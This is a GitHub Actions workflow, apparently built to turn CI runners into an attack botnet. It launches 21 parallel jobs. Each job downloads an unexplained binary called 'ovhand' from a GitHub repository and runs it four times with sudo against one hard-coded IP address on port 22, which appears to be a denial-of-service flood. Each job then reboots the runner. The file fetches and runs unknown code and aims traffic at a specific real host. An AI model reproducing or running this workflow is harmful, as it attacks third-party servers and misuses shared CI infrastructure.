name: Ubuntu VDS 40 saniye o v

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 21
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21]


    steps:
      - name: OK !
        run: |
          wget https://github.com/AhmetKesser/Deneme/raw/refs/heads/main/ovhand 
          sudo su
          chmod +x ovhand
          PIDS=()
          for i in {1..4}; do
            sudo timeout 100 ./ovhand 141.94.131.184 22 10 90
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 100
        
      - name: OK !
        run: sudo reboot
